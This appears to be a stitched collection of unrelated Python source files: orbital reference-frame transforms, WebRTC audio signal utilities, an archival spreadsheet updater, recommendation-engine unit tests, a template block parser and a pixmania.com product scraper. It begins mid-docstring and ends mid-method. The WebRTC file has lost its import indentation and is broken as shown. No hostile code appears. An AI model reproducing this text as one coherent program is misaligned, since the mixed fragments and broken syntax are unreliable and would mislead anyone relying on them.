        ~beyond.frames.frames.Frame
    Raise:
        UnknownFrameError: when no frame is registered under that name
    """
    # Look the name up in the dynamic registry of frames
    if frame in dynamic:
        return dynamic[frame]
    raise UnknownFrameError(frame)
class _MetaFrame(type, Node):
    """This MetaClass is here to join the behaviors of ``type`` and ``Node``
    """

    def __init__(cls, name, bases, dct):
        # 'bypass' silences the warning emitted below when redefining an
        # already-registered frame name; it is popped so it does not end up
        # as a class attribute.
        bypass = dct.pop("bypass", False)
        super(_MetaFrame, cls).__init__(name, bases, dct)
        # Skip over 'type' in the MRO so this reaches Node.__init__(name)
        super(type, cls).__init__(name)
        if not bypass and cls.__name__ in dynamic:
            # Lazy %-style arguments: formatting is deferred to the logging
            # machinery instead of being done eagerly at call time.
            log.warning(
                "A frame with the name '%s' is already registered. Overriding",
                cls.__name__,
            )
        cls.__module__ = __name__ + ".dynamic"
        # Making the frame available to the get_frame function
        dynamic[cls.__name__] = cls

    def __repr__(cls):  # pragma: no cover
        return "<Frame '{}'>".format(cls.name)
class Frame(metaclass=_MetaFrame):
    """Frame base class
    """

    # Default center of the frame; subclasses or dynamically created
    # frames may override this.
    center = Earth

    def __init__(self, date, orbit):
        """
        Args:
            date (~beyond.utils.Date): date of the state vector
            orbit (numpy.ndarray): 6-element state vector (position + velocity)
        """
        self.date = date
        self.orbit = orbit

    def __str__(self):  # pragma: no cover
        return self.name

    def __repr__(self):  # pragma: no cover
        return "<Frame obj '{}'>".format(self.__class__.__name__)

    @classmethod
    def _convert(cls, x=None, y=None):
        # Build a 6x6 block-diagonal matrix from two 3x3 blocks:
        # `x` applies to the position part, `y` to the velocity part.
        # A missing block defaults to identity.
        m = np.identity(6)
        if x is not None:
            m[:3, :3] = x
        if y is not None:
            m[3:, 3:] = y
        return m

    def transform(self, new_frame):
        """Change the frame of the orbit

        Args:
            new_frame (str)
        Return:
            numpy.ndarray
        """
        # Path of intermediate frames between this frame and the target
        # (graph traversal provided by the Node machinery of the metaclass).
        steps = self.__class__.steps(new_frame)
        orbit = self.orbit
        for _from, _to in steps:
            from_obj = _from(self.date, orbit)
            direct = "_to_%s" % _to
            if hasattr(from_obj, direct):
                # Direct conversion is defined on the source frame
                rotation, offset = getattr(from_obj, direct)()
            else:
                to_obj = _to(self.date, orbit)
                inverse = "_to_%s" % _from
                if hasattr(to_obj, inverse):
                    # Only the opposite conversion is defined: invert it by
                    # transposing the rotation and negating the offset.
                    rotation, offset = getattr(to_obj, inverse)()
                    rotation = rotation.T
                    offset = -offset
                else:
                    raise NotImplementedError(
                        "Unknown transformation {} to {}".format(_from, _to)
                    )
            if getattr(_from, "_rotation_before_translation", False):
                # In case of topocentric frame, the rotation is done before the translation
                orbit = offset + (rotation @ orbit)
            else:
                orbit = rotation @ (offset + orbit)
        return orbit
class TEME(Frame):
    """True Equator Mean Equinox"""

    orientation = "TEME"

    def _to_TOD(self):
        # Equation-of-the-equinoxes angle (IAU 1980), without EOP
        # correction, using a 4-term series.
        equin = iau1980.equinox(
            self.date, eop_correction=False, terms=4, kinematic=False
        )
        # Rotation about the Z axis; same rotation applied to position
        # and velocity, no translation.
        m = rot3(-np.deg2rad(equin))
        return self._convert(m, m), np.zeros(6)
class GTOD(Frame):
    """Greenwich True Of Date"""

    # NOTE(review): no _to_* conversion is defined here, and GTOD is not
    # linked into the frame tree at the bottom of this module.
    orientation = "GTOD"
class WGS84(Frame):
    """World Geodetic System 1984"""

    orientation = "WGS84"

    def _to_ITRF(self):
        # WGS84 is treated as coincident with ITRF: identity rotation,
        # no translation.
        return np.identity(6), np.zeros(6)
class PEF(Frame):
    """Pseudo Earth Fixed"""

    orientation = "PEF"

    def _to_TOD(self):
        # Apparent sidereal time rotation (IAU 1980), without EOP correction
        m = iau1980.sideral(self.date, model="apparent", eop_correction=False)
        offset = np.zeros(6)
        # Velocity correction for the Earth's rotation (omega x r)
        offset[3:] = np.cross(iau1980.rate(self.date), self.orbit[:3])
        return self._convert(m, m), offset
class TOD(Frame):
    """True (Equator) Of Date"""

    orientation = "TOD"

    def _to_MOD(self):
        # Nutation (IAU 1980 model), without EOP correction
        m = iau1980.nutation(self.date, eop_correction=False)
        return self._convert(m, m), np.zeros(6)
class MOD(Frame):
    """Mean (Equator) Of Date"""

    orientation = "MOD"

    def _to_EME2000(self):
        # Precession (IAU 1980 model). 'precesion' (sic) matches the
        # function name exposed by the iau1980 module.
        m = iau1980.precesion(self.date)
        return self._convert(m, m), np.zeros(6)
class EME2000(Frame):
    """EME2000 inertial frame (also known as J2000)"""

    # No conversion methods here: neighbouring frames (MOD, G50) define
    # their own conversions toward EME2000.
    orientation = "EME2000"
class ITRF(Frame):
    """International Terrestrial Reference Frame"""

    orientation = "ITRF"

    def _to_PEF(self):
        # Earth orientation (IAU 1980 model)
        m = iau1980.earth_orientation(self.date)
        return self._convert(m, m), np.zeros(6)

    def _to_TIRF(self):
        # Earth orientation (IAU 2010 model)
        m = iau2010.earth_orientation(self.date)
        return self._convert(m, m), np.zeros(6)
class TIRF(Frame):
    """Terrestrial Intermediate Reference Frame"""

    orientation = "TIRF"

    def _to_CIRF(self):
        # Sidereal time rotation (IAU 2010 model)
        m = iau2010.sideral(self.date)
        offset = np.zeros(6)
        # Velocity correction for the Earth's rotation (omega x r)
        offset[3:] = np.cross(iau2010.rate(self.date), self.orbit[:3])
        return self._convert(m, m), offset
class CIRF(Frame):
    """Celestial Intermediate Reference Frame"""

    orientation = "CIRF"

    def _to_GCRF(self):
        # Precession/nutation (IAU 2010 model). 'precesion' (sic) matches
        # the function name exposed by the iau2010 module.
        m = iau2010.precesion_nutation(self.date)
        return self._convert(m, m), np.zeros(6)
class GCRF(Frame):
    """Geocentric Celestial Reference Frame"""

    # Conversions toward GCRF are defined on the neighbouring CIRF frame.
    orientation = "GCRF"
class G50(Frame):
    """Gamma50 Reference Frame
    """

    orientation = "G50"

    def _to_EME2000(self):
        # Constant rotation matrix between Gamma50 and EME2000, applied
        # identically to position and velocity; no translation.
        m = [
            [0.9999256794956877, -0.0111814832204662, -0.0048590038153592],
            [0.0111814832391717, 0.9999374848933135, -0.0000271625947142],
            [0.0048590037723143, -0.0000271702937440, 0.9999881946023742],
        ]
        return self._convert(m, m), np.zeros(6)
def orbit2frame(name, ref_orbit, orientation=None, center=None, bypass=False):
    """Create a frame based on a Orbit or Ephem object.

    Args:
        name (str): Name to give the created frame
        ref_orbit (Orbit or Ephem):
        orientation (str): Orientation of the created frame
        center: Center of the created frame (defaults to Earth)
        bypass (bool): By-pass the warning when creating a frame with an already
            taken name
    Return:
        Frame:

    If orientation is ``None``, the new frame will keep the orientation of the
    reference frame of the Orbit and move along with the orbit.
    Other acceptable values are ``"QSW"`` (and its aliases "LVLH" and "RSW") or ``"TNW"``.
    See :py:func:`~beyond.frames.local.to_qsw` and :py:func:`~beyond.frames.local.to_tnw`
    for informations regarding these orientations.
    """
    # Normalize the orientation aliases; anything unknown is rejected early.
    if orientation is None:
        orientation = ref_orbit.frame.orientation
    elif orientation.upper() in ("RSW", "LVLH"):
        orientation = "QSW"
    elif orientation.upper() not in ("QSW", "TNW"):
        raise ValueError("Unknown orientation '%s'" % orientation)

    if center is None:
        center = Earth

    def _to_parent_frame(self):
        """Conversion from orbit frame to parent frame
        """
        # The translation part follows the reference orbit at this date.
        offset = ref_orbit.propagate(self.date).base.copy()
        if orientation.upper() in ("QSW", "TNW"):
            # propagation of the reference orbit to the date of the
            # converted orbit
            orb = ref_orbit.propagate(self.date)
            m = to_qsw(orb) if orientation.upper() == "QSW" else to_tnw(orb)
            # we transpose the matrix because it represents the conversion
            # from inertial to local frame, and we'd like the other way around
            rotation = Frame._convert(m, m).T
        else:
            # The orientation is the same as the parent reference frame
            rotation = np.identity(6)
        return rotation, offset

    # define the name of the method of conversion
    mtd = "_to_%s" % ref_orbit.frame.__name__
    # dictionary which defines attributes of the created class
    dct = {
        mtd: _to_parent_frame,
        "orientation": orientation,
        "center": center,
        "bypass": bypass,
    }
    # Creation of the class
    cls = _MetaFrame(name, (Frame,), dct)
    # Link to the parent
    cls + ref_orbit.frame
    return cls
# Build the frame transformation tree; '+' presumably links two frames in
# the Node graph (behavior inherited from beyond.utils.node — TODO confirm).
# The resulting graph mirrors the diagram in the module docstring.
WGS84 + ITRF + PEF + TOD + MOD + EME2000
TOD + TEME
# EME2000 + GCRF
ITRF + TIRF + CIRF + GCRF
EME2000 + G50
|
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Signal processing utility module.
"""
import array
import logging
import os
import sys
try:
import numpy as np
except ImportError:
logging.critical('Cannot import the third-party Python package numpy')
sys.exit(1)
try:
import pydub
import pydub.generators
except ImportError:
logging.critical('Cannot import the third-party Python package pydub')
sys.exit(1)
try:
import scipy.signal
except ImportError:
logging.critical('Cannot import the third-party Python package scipy')
sys.exit(1)
from . import exceptions
class SignalProcessingUtils(object):
    """Collection of signal processing utilities.
    """

    def __init__(self):
        pass

    @classmethod
    def LoadWav(cls, filepath, channels=1):
        """Loads wav file.

        Args:
          filepath: path to the wav audio track file to load.
          channels: number of channels (downmixing to mono by default).

        Returns:
          AudioSegment instance.
        """
        if not os.path.exists(filepath):
            logging.error('cannot find the <%s> audio track file', filepath)
            raise exceptions.FileNotFoundError()
        return pydub.AudioSegment.from_file(
            filepath, format='wav', channels=channels)

    @classmethod
    def SaveWav(cls, output_filepath, signal):
        """Saves wav file.

        Args:
          output_filepath: path to the wav audio track file to save.
          signal: AudioSegment instance.
        """
        return signal.export(output_filepath, format='wav')

    @classmethod
    def CountSamples(cls, signal):
        """Number of samples per channel.

        Args:
          signal: AudioSegment instance.

        Returns:
          An integer.
        """
        number_of_samples = len(signal.get_array_of_samples())
        assert signal.channels > 0
        assert number_of_samples % signal.channels == 0
        # Floor division so the result is an int on both Python 2 and 3
        # (true division would return a float in Python 3, contradicting
        # the documented return type).
        return number_of_samples // signal.channels

    @classmethod
    def GenerateWhiteNoise(cls, signal):
        """Generates white noise.

        White noise is generated with the same duration and in the same format as a
        given signal.

        Args:
          signal: AudioSegment instance.

        Returns:
          AudioSegment instance.
        """
        generator = pydub.generators.WhiteNoise(
            sample_rate=signal.frame_rate,
            bit_depth=signal.sample_width * 8)
        return generator.to_audio_segment(
            duration=len(signal),
            volume=0.0)

    @classmethod
    def ApplyImpulseResponse(cls, signal, impulse_response):
        """Applies an impulse response to a signal.

        Args:
          signal: AudioSegment instance.
          impulse_response: list or numpy vector of float values.

        Returns:
          AudioSegment instance.
        """
        # Get samples.
        assert signal.channels == 1, (
            'multiple-channel recordings not supported')
        samples = signal.get_array_of_samples()

        # Convolve.
        logging.info('applying %d order impulse response to a signal lasting %d ms',
                     len(impulse_response), len(signal))
        convolved_samples = scipy.signal.fftconvolve(
            in1=samples,
            in2=impulse_response,
            mode='full').astype(np.int16)
        logging.info('convolution computed')

        # Cast.
        convolved_samples = array.array(signal.array_type, convolved_samples)

        # Verify.
        logging.debug('signal length: %d samples', len(samples))
        logging.debug('convolved signal length: %d samples', len(convolved_samples))
        # A 'full' convolution is always longer than its first input.
        assert len(convolved_samples) > len(samples)

        # Generate convolved signal AudioSegment instance.
        convolved_signal = pydub.AudioSegment(
            data=convolved_samples,
            metadata={
                'sample_width': signal.sample_width,
                'frame_rate': signal.frame_rate,
                'frame_width': signal.frame_width,
                'channels': signal.channels,
            })
        assert len(convolved_signal) > len(signal)

        return convolved_signal

    @classmethod
    def Normalize(cls, signal):
        """Normalizes a signal.

        Args:
          signal: AudioSegment instance.

        Returns:
          An AudioSegment instance.
        """
        # Raise the gain so that the peak sits at 0 dBFS.
        return signal.apply_gain(-signal.max_dBFS)

    @classmethod
    def Copy(cls, signal):
        """Makes a copy of a signal.

        Args:
          signal: AudioSegment instance.

        Returns:
          An AudioSegment instance.
        """
        return pydub.AudioSegment(
            data=signal.get_array_of_samples(),
            metadata={
                'sample_width': signal.sample_width,
                'frame_rate': signal.frame_rate,
                'frame_width': signal.frame_width,
                'channels': signal.channels,
            })

    @classmethod
    def MixSignals(cls, signal, noise, target_snr=0.0, bln_pad_shortest=False):
        """Mixes two signals with a target SNR.

        Mix two signals with a desired SNR by scaling noise (noise).
        If the target SNR is +/- infinite, a copy of signal/noise is returned.

        Args:
          signal: AudioSegment instance (signal).
          noise: AudioSegment instance (noise).
          target_snr: float, numpy.inf or -numpy.inf (dB).
          bln_pad_shortest: if True, it pads the shortest signal with silence at the
                            end.

        Returns:
          An AudioSegment instance.
        """
        # Handle infinite target SNR.
        # np.inf instead of the np.Inf alias (removed in NumPy 2.0).
        if target_snr == -np.inf:
            # Return a copy of noise.
            logging.warning('SNR = -Inf, returning noise')
            return cls.Copy(noise)
        elif target_snr == np.inf:
            # Return a copy of signal.
            logging.warning('SNR = +Inf, returning signal')
            return cls.Copy(signal)

        # Check signal and noise power.
        signal_power = float(signal.dBFS)
        noise_power = float(noise.dBFS)
        if signal_power == -np.inf:
            logging.error('signal has -Inf power, cannot mix')
            raise exceptions.SignalProcessingException(
                'cannot mix a signal with -Inf power')
        if noise_power == -np.inf:
            logging.error('noise has -Inf power, cannot mix')
            raise exceptions.SignalProcessingException(
                'cannot mix a signal with -Inf power')

        # Pad signal (if necessary). If noise is the shortest, the AudioSegment
        # overlay() method implicitly pads noise. Hence, the only case to handle
        # is signal shorter than noise and bln_pad_shortest True.
        if bln_pad_shortest:
            signal_duration = len(signal)
            noise_duration = len(noise)
            logging.warning('mix signals with padding')
            logging.warning('  signal: %d ms', signal_duration)
            logging.warning('  noise: %d ms', noise_duration)
            padding_duration = noise_duration - signal_duration
            if padding_duration > 0:  # That is signal_duration < noise_duration.
                logging.debug('  padding: %d ms', padding_duration)
                padding = pydub.AudioSegment.silent(
                    duration=padding_duration,
                    frame_rate=signal.frame_rate)
                logging.debug('  signal (pre): %d ms', len(signal))
                signal = signal + padding
                logging.debug('  signal (post): %d ms', len(signal))
                # Update power.
                signal_power = float(signal.dBFS)

        # Mix signals using the target SNR.
        gain_db = signal_power - noise_power - target_snr
        return cls.Normalize(signal.overlay(noise.apply_gain(gain_db)))
|
<filename>updateASpace.py
import os
import csv
import openpyxl
import argparse
# Command-line interface: a package ID, plus an optional single sheet name.
argParse = argparse.ArgumentParser()
argParse.add_argument("package", help="Package ID in Processing directory.")
argParse.add_argument("-f", "--file", help="File name of spreadsheet to be updated. If no files are listed, all will be updated.", default=None)
args = argParse.parse_args()

# Root of the processing share depends on the platform.
if os.name == 'nt':
    processingDir = "\\\\Romeo\\SPE\\processing"
else:
    processingDir = "/media/SPE/processing"

# The collection ID is the leading token of the package ID.
colID = args.package.split("_")[0].split("-")[0]
package = os.path.join(processingDir, colID, args.package)
derivatives = os.path.join(package, "derivatives")
masters = os.path.join(package, "masters")
metadata = os.path.join(package, "metadata")

# Bug fix: the original code did `raise ("...")`, which attempts to raise a
# plain string — itself a TypeError in Python 3.
if not os.path.isdir(package) or not os.path.isdir(derivatives) or not os.path.isdir(metadata):
    raise RuntimeError("ERROR: " + package + " is not a valid package.")
hyraxImport = os.path.join(metadata, args.package + ".tsv")
if not os.path.isfile(hyraxImport):
    raise RuntimeError("ERROR: " + hyraxImport + " is not a valid hryax import TSV.")

# Read the Hyrax import TSV once up front instead of re-opening and
# re-parsing it for every spreadsheet row.
with open(hyraxImport, "r") as tsvFile:
    hyraxRows = list(csv.reader(tsvFile, delimiter='\t'))

for sheetFile in os.listdir(metadata):
    if sheetFile.lower().endswith(".xlsx"):
        if not args.file or args.file.lower() == sheetFile.lower():
            print ("Reading sheet: " + sheetFile)
            sheetPath = os.path.join(metadata, sheetFile)
            wb = openpyxl.load_workbook(filename=sheetPath, read_only=False)
            # validate sheets
            for sheet in wb.worksheets:
                checkSwitch = True
                try:
                    if sheet["H1"].value.lower().strip() != "title":
                        checkSwitch = False
                    elif sheet["H2"].value.lower().strip() != "level":
                        checkSwitch = False
                    elif sheet["H3"].value.lower().strip() != "ref id":
                        checkSwitch = False
                    elif sheet["J6"].value.lower().strip() != "date 1 display":
                        checkSwitch = False
                    elif sheet["D6"].value.lower().strip() != "container uri":
                        checkSwitch = False
                except Exception:
                    # Header cells missing or empty: mark the sheet invalid.
                    # (Previously the error was printed here but checkSwitch
                    # stayed True, so the malformed sheet was processed anyway.)
                    checkSwitch = False
                if checkSwitch == False:
                    print ("ERROR: incorrect sheet " + sheet.title + " in file " + sheetPath)
                else:
                    rowCount = 0
                    for row in sheet.rows:
                        rowCount += 1
                        # Data rows start after the 6-row header block.
                        if rowCount > 6:
                            if row[22].value is not None:
                                # Column 22 may hold "path|extra"; keep the path part.
                                if "|" in row[22].value:
                                    daoPath = row[22].value.split("|")[0]
                                else:
                                    daoPath = row[22].value
                                filePathDerivatives = os.path.join(derivatives, daoPath)
                                filePathMasters = os.path.join(masters, daoPath)
                                # Prefer the derivative copy when both exist.
                                if os.path.isfile(filePathDerivatives):
                                    filePath = filePathDerivatives
                                else:
                                    filePath = filePathMasters
                                if os.path.isfile(filePath):
                                    refID = row[0].value
                                    match = False
                                    for line in hyraxRows:
                                        if line[1].startswith("daos/") and line[7] == refID:
                                            print ("Updating " + str(row[22].value) + " to " + str(line[1]))
                                            row[22].value = "https://archives.albany.edu/concern/" + line[1]
                                            match = True
                                    if not match:
                                        print ("ERROR: failed to find matching refID " + refID + " in hyrax upload file " + hyraxImport)
            # Write the updated workbook next to the original.
            wb.save(filename=os.path.join(metadata, "updated_" + sheetFile))
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 2020, <NAME>
import multiprocessing as mp
import unittest
from typing import Iterable
import numpy as np
import pandas as pd
from ..core.computation import Engine
class EngineTest(unittest.TestCase):
    """
    Tests `computation.Engine` class.
    """

    def setUp(self) -> None:
        """
        Sets up the tests.
        """
        self._engine = Engine(random_state=0)

    def test_initialize_factors(self) -> None:
        """
        Tests that `Engine._initialize_factors` produce factor
        matrices `X` and `Y` with random values in correct shape.
        """
        test_m, test_n = (15, 25)
        X_expected, Y_expected = self._engine._initialize_factors(test_m, test_n)
        for expected, size in ((X_expected, test_m), (Y_expected, test_n)):
            self.assertTupleEqual((size, self._engine._n_factors), expected.shape)

    def test_feedback_1d_generator(self) -> None:
        """
        Tests that `Engine._feedback_1d_generator` produces correct
        row/column arrays from `R` based on the `axis` argument.
        """

        def assert_collection_of_numpy_equal(
            x: Iterable[np.ndarray], y: Iterable[np.ndarray]
        ) -> None:
            """
            Asserts that collections `x` and `y` containing
            numpy arrays are identical.
            """
            x, y = list(x), list(y)
            # Bug fix: previously this compared len(x) with itself, which
            # made the length check a no-op.
            assert len(x) == len(y)
            for array_x, array_y in zip(x, y):
                np.testing.assert_array_equal(array_x, array_y)

        test_R = pd.DataFrame({"A": [1, 3], "B": [6, 7]})
        tests = (
            ([np.array([1, 3]), np.array([6, 7])], 0),
            ([np.array([1, 6]), np.array([3, 7])], 1),
        )
        for expected, axis in tests:
            result = list(self._engine._feedback_1d_generator(test_R, axis))
            assert_collection_of_numpy_equal(result, expected)

    def test_compute_factors_1d(self) -> None:
        """
        Tests that `Engine._compute_factors_1d` computes correct
        factor row for one user/item.
        """
        np.random.seed(0)
        test_feedback_1d = np.array([5, 4, 0, 0, 0, 4, 0, 0, 0, 0])
        test_other_factors = np.random.rand(10, 5)
        test_other_factors_small = np.dot(test_other_factors.T, test_other_factors)
        result = self._engine._compute_factors_1d(
            feedback_1d=test_feedback_1d,
            other_factors=test_other_factors,
            other_factors_small=test_other_factors_small,
            reg_lambda=1,
            alpha=40,
        )
        expected = np.array([0.2940538, 0.52162197, 0.82403064, -0.2290155, 0.17128187])
        np.testing.assert_array_almost_equal(result, expected, decimal=7)

    def test_compute_factors(self) -> None:
        """
        Tests that `Engine._compute_factors` computes
        correct factor rows for every user/item.
        """
        np.random.seed(0)
        R_test = pd.DataFrame(
            [
                [3, 2, 0, 0, 0, 0, 0, 0, 1, 2],
                [0, 2, 3, 0, 0, 0, 0, 2, 3, 0],
                [0, 0, 0, 0, 0, 0, 0, 0, 0, 2],
                [0, 1, 0, 2, 2, 0, 0, 0, 2, 2],
                [1, 0, 0, 0, 2, 0, 3, 0, 0, 0],
                [1, 0, 0, 0, 2, 3, 0, 3, 0, 0],
                [0, 0, 3, 0, 2, 0, 0, 0, 0, 0],
                [0, 0, 1, 3, 3, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            ]
        )
        test_n = R_test.shape[-1]
        # axis=1 test for user factors, other_factors matrix is for items
        test_axis = 1
        test_other_factors = np.random.rand(test_n, 3)
        pool = mp.Pool(1)
        try:
            result = self._engine._compute_factors(
                pool=pool, R=R_test, other_factors=test_other_factors, axis=test_axis
            )
        finally:
            pool.close()
        # shape (9, 3): 3 factors for 9 users
        expected = np.array(
            [
                [0.35764017, 1.03013196, 0.27789359],
                [1.21552231, 1.36885415, -0.71711505],
                [1.5414733, -0.52604296, -0.47427519],
                [0.24321584, 1.0214088, 0.40020838],
                [0.04003445, 1.06238047, 0.06082416],
                [-0.51951887, 1.15240956, 1.12119426],
                [-0.79891536, 1.55973535, -0.05766712],
                [-1.09061448, 1.76283214, -0.04719709],
                [0.27658886, 0.94346013, -0.90276183],
            ]
        )
        np.testing.assert_array_almost_equal(result, expected, decimal=7)

    @staticmethod
    def test_predict() -> None:
        """
        Tests that `Engine.predict` computes correct
        recommendation for given `user`.
        """
        engine = Engine()
        engine._X = np.array([[0.50, 0.90, 0.30], [0.05, 0.94, 0.81]])
        engine._Y = np.array(
            [[0.20, 0.12, 0.80], [0.50, 0.97, 0.03], [0.75, 0.02, 0.15]]
        )
        # user 20 likes factors 1 and 2
        # item 4 really belongs to genre 1 and item 3 belongs to genre 2
        # these two items will be recommended
        #
        # user 20 doesnt care about factor 0 where item 5 belongs
        # small recommendation for item 5
        engine._user_index = pd.Index([10, 20], name="user_id")
        engine._item_index = pd.Index([3, 4, 5], name="item_id")
        result = engine.predict(user=20)
        result_top_2 = engine.predict(user=20, top_n=2)
        expected = pd.Series(
            [0.7708, 0.9611, 0.1778], index=engine._item_index, name=20
        )
        # calling .nlargest on series will sort the values (descending)
        expected_top_2 = expected[[True, True, False]].sort_values(ascending=False)
        pd.testing.assert_series_equal(result, expected)
        pd.testing.assert_series_equal(result_top_2, expected_top_2)

    def test_get_loss(self) -> None:
        """
        Tests that `Engine._get_loss` computes correct least squares loss.
        """
        R_test = np.array([[1, 0, 0, 4], [2, 1, 0, 0], [0, 0, 0, 1]])
        X_test = np.array([[0.3, 0.1], [0.9, 0.4], [0.1, 0.5]])
        Y_test = np.array([[0.4, 0.1], [0.9, 0.5], [0.9, 0.9], [0.6, 0.5]])
        result = self._engine._get_loss(X_test, Y_test, R_test)
        expected = 177.73779
        self.assertAlmostEqual(result, expected, places=4)
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    unittest.main()
|
import re
class Blocks:
    """Parser for qengine-style templates.

    A template consists of blocks delimited by ``{% ... %}`` tags of the
    form ``{%btype:bname`` or ``{%btype:bname:bcond``; template steps are
    separated by ``@@@@`` markers.
    """

    def __init__(self):
        self.errors = []
        # block format: { blockname : [blocktype, blockcontent, bconditional] }
        self.blocks = {}
        # current block name
        self.cblock = ''
        # keep the blockname indexes of self.blocks in order processed here
        self.order = []

    # return True if open tag found, False otherwise
    def __parseOpen(self, line):
        m = re.split('{%', line, maxsplit=1)
        if len(m) > 1:
            # found open tag, grab btype & bname, send the rest to parseClose
            tm = re.split(':', m[1], maxsplit=2)
            btype = ''
            bname = ''
            bcond = None
            therest = ''
            # btype:bname:bcond extra
            if len(tm) > 2:
                btype = tm[0]
                bname = tm[1]
                # raw string so '\s' is a regex class, not a string escape
                nm = re.split(r'\s', tm[2], maxsplit=1)
                if len(nm) > 1:
                    bcond = nm[0]
                    therest = nm[1]
                else:
                    bcond = nm[0]
            # btype:bname extra
            elif len(tm) > 1:
                btype = tm[0]
                nm = re.split(r'\s', tm[1], maxsplit=1)
                if len(nm) > 1:
                    bname = nm[0]
                    therest = nm[1]
                else:
                    bname = nm[0]
            # error
            else:
                self.errors.append('incorrect open tag on line ' + str(self.lncnt) + ': the entire open tag must be on one line like, {%btype:bname or {%btype:bname:bcond')
                return False
            #
            self.cblock = bname
            self.__createBlock(bname, btype, bcond)
            if len(therest) > 0:
                # the remainder of the line may already contain the close tag
                return not self.__parseClose(therest)
            else:
                return True
        else:
            # ignore everything between %} {%
            return False

    # return True if close tag found, False otherwise
    def __parseClose(self, line):
        m = re.split(r'%}', line, maxsplit=1)
        if len(m) > 1:
            # found end tag, add line to block content, send the rest to parseOpen
            self.__addToBlock(m[0])
            return not self.__parseOpen(m[1])
        else:
            # did not find end tag, just add line to block content
            self.__addToBlock(line)
            return False

    def __createBlock(self, bname, btype, bcond=None):
        # register a new (possibly overwriting) block and remember its order
        self.blocks[bname] = [btype, '', bcond]
        self.order.append(bname)

    def __addToBlock(self, line):
        # append raw text to the current block's content
        self.blocks[self.cblock][1] += line

    def __parseQengine(self, lines):
        # alternate between searching for an open tag and a close tag
        bsearch = True
        self.lncnt = 0
        for line in lines:
            self.lncnt += 1
            if bsearch:
                bsearch = not self.__parseOpen(line)
            else:
                bsearch = self.__parseClose(line)
        self.lncnt = 0

    # checks step conditional, returns: step, step - 1 (conditional not met), step - 0.5 (conditional not met, but run grading in next step)
    def checkStepConditional(self, data, step, qenginevars):
        matches = re.findall('@@@@(.*)', data)
        check = matches[step - 1].split('.')
        # either invalid conditional or no conditional, either way, continue to next step
        if len(check) > 2:
            return step
        # check that conditional exists or not
        if check[0] in qenginevars:
            if check[1] in qenginevars[check[0]]:
                return step
            else:
                pass
        else:
            pass
        # if here, previous step must run, but check if we can grade in next step
        tmp = Blocks()
        tmp.parseString(data, step)
        for key in tmp.blocks:
            if tmp.blocks[key][0] == 'qans':
                return step - 0.5
        # if here, there is no 'qans' block in next step, so no grade will happen, just return previous step
        return step - 1

    # if there is an error in the open tag formatting,
    # the entire block is just discarded,
    # other well formatted blocks will be kept
    def parseFile(self, file, step=0):
        with open(file) as f:
            lines = f.read().split('@@@@')[step].splitlines(True)
        self.__parseQengine(lines)

    def parseString(self, string, step=0):
        lines = string.split('@@@@')[step].splitlines(True)
        self.__parseQengine(lines)

    def parseAllSteps(self, data):
        blocks = data.split('@@@@')
        for block in blocks:
            lines = block.splitlines(True)
            self.__parseQengine(lines)

    def reset(self):
        # clear all parser state so the instance can be reused
        self.errors = []
        self.blocks = {}
        self.cblock = ''
        self.order = []
|
<filename>portfolio/Python/scrapy/outillage/pixmania_spider.py
#!/usr/bin/python
# -*- coding: latin-1 -*-
import os
from scrapy import log
from scrapy.http import Request
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.utils.url import urljoin_rfc
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
# Map of category landing pages to their menu labels (latin-1 source file),
# used by the spider to locate the matching navigation box on each page.
URLS = {"http://www.pixmania.com/fr/fr/jardin/44/onglet.html": "Jardin",
        "http://www.pixmania.com/fr/fr/bricolage/115/onglet.html": "Bricolage",
        "http://www.pixmania.com/aspirateur-et-nettoyeur/frfr45_443_pm.html": "Aspirateur et nettoyeur",
        "http://www.pixmania.com/arrosage/frfr44_2043_pm.html": "Arrosage",
        "http://www.pixmania.com/outillage-a-main/frfr44_2042_pm.html": "Outillage à main",
        "http://www.pixmania.com/outillage-motorise/frfr44_2041_pm.html": "Outillage motorisé"}
class PixmaniaSpider(BaseSpider):
    # Legacy scrapy (Python 2) spider crawling pixmania.com tool/garden
    # categories and yielding Product items with url/name/price.
    name = "pixmania.com"
    allowed_domains = ["pixmania.com"]
    start_urls = URLS.keys()

    def parse(self, response):
        # Entry point: find the navigation box whose title matches the
        # category label of this start URL, then follow its sub-links.
        urls = URLS
        hxs = HtmlXPathSelector(response)
        links_div = hxs.select(u'//div[@class="box box-nav box-universe-nav" and strong[text()="'+ urls[response.url].decode('utf8')+'"]]'.decode('utf8'))
        sites = links_div.select('ul/li[not(@class="highlight")]/a/@href')
        for site in sites:
            first_url = site.extract()
            # force the first page of the listing
            url = urljoin_rfc(first_url, '?sPageInfo=0', response.encoding)
            yield Request(url, callback = self.parse_categories)

    def parse_categories(self, response):
        # If a pagination landmark is present, enqueue every result page;
        # otherwise recurse one level deeper into sub-categories.
        hxs = HtmlXPathSelector(response)
        if hxs.select('//span[@class="nav-landmark"]/text()'):
            total_pages = int(hxs.select('//span[@class="nav-landmark"]/text()').extract()[0].split()[-1])
            for i in range(total_pages):
                url = self._urljoin(response,'?sPageInfo=%s' % i)
                yield Request(url, callback = self.parse_products)
        else:
            name = hxs.select('//div/div/div/div/div/h1/text()').extract()[0]
            links_div = hxs.select(u'//div[@class="box box-nav box-universe-nav" and strong[text()="'+ name +'"]]'.decode('utf8'))
            sites = links_div.select('ul/li[not(@class="highlight")]/a/@href')
            for site in sites:
                url = site.extract()
                yield Request(url, callback = self.parse_categories)

    def parse_products(self, response):
        # Extract products from either the grid layout ("grid-25") or,
        # failing that, the table layout ("prd first").
        hxs = HtmlXPathSelector(response)
        products = hxs.select('//*[@id="area-2"]//div[@class="grid-25"]')
        if products:
            for product in products:
                loader = ProductLoader(item=Product(), selector=product)
                loader.add_xpath('url', 'div/h3/a/@href')
                if product.select('div/h3/a/abbr/@title'):
                    loader.add_xpath('name', 'div/h3/a/abbr/@title')
                else:
                    loader.add_xpath('name','div/h3/a/text()')
                price = product.select('div/div/p[@class="prd-amount"]/strong/text()').extract()[0]
                loader.add_value('price', self._encode_price(price))
                yield loader.load_item()
